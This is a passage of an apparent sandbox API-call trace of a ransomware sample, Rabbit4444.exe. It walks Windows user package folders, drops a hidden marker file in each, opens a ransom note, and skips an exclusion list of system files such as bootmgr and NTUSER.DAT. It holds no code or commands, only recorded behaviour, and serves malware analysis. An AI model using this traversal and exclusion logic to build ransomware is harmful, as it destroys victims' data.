lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.443] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.443] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.443] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.443] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.443] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf06611, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf06611, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.443] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.443] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.443] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf06611, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf06611, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.443] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0061.443] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.443] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.444] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.444] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.445] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.445] CloseHandle (hObject=0x2a0) returned 1 [0061.445] CloseHandle (hObject=0x27c) returned 1 [0061.445] GetCurrentThreadId () returned 0xd98 [0061.445] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0061.445] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache" [0061.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123eb8 | out: hHeap=0xe0000) returned 1 [0061.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0061.445] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache" [0061.445] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\" [0061.445] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0061.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.446] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.449] FlushFileBuffers (hFile=0x27c) returned 1 [0061.450] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.450] CloseHandle (hObject=0x27c) returned 1 [0061.450] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache") returned 85 [0061.450] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.450] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24faca3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.451] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.451] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.451] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.451] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24faca3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.451] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.451] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.451] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf2c77d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf2c77d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.451] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.451] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.451] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf2c77d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf2c77d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf2c77d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.451] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.451] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.452] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.452] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.452] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.452] CloseHandle (hObject=0x2a0) returned 1 [0061.452] CloseHandle (hObject=0x27c) returned 1 [0061.452] GetCurrentThreadId () returned 0xd98 [0061.452] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0061.452] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe" [0061.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e368 | out: hHeap=0xe0000) returned 1 [0061.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0061.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe" [0061.452] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\" [0061.452] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0061.452] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.456] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.458] FlushFileBuffers (hFile=0x27c) returned 1 [0061.459] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.459] CloseHandle (hObject=0x27c) returned 1 [0061.460] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe") returned 86 [0061.460] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.460] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf52919, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.460] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.460] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.460] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.460] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.460] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf52919, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.460] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.460] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.461] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.461] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.461] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf52919, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf52919, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf52919, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.461] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.461] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0061.461] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0061.461] lstrcpyW (in: lpString1=0x130ebe6, lpString2="AC" | out: lpString1="AC") returned="AC" [0061.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0061.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x11e368 [0061.461] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x121fc8 [0061.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0061.461] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0061.462] lstrcpyW (in: lpString1=0x130ebe6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0061.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0061.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123760 [0061.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122328 [0061.462] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0061.462] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0061.462] lstrcpyW (in: lpString1=0x130ebe6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0061.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0061.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116ba0 [0061.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122228 [0061.462] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0061.462] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0061.462] lstrcpyW (in: lpString1=0x130ebe6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116c70 [0061.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x121fe8 [0061.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0061.463] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0061.463] lstrcpyW (in: lpString1=0x130ebe6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116a00 [0061.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122008 [0061.463] FindNextFileW 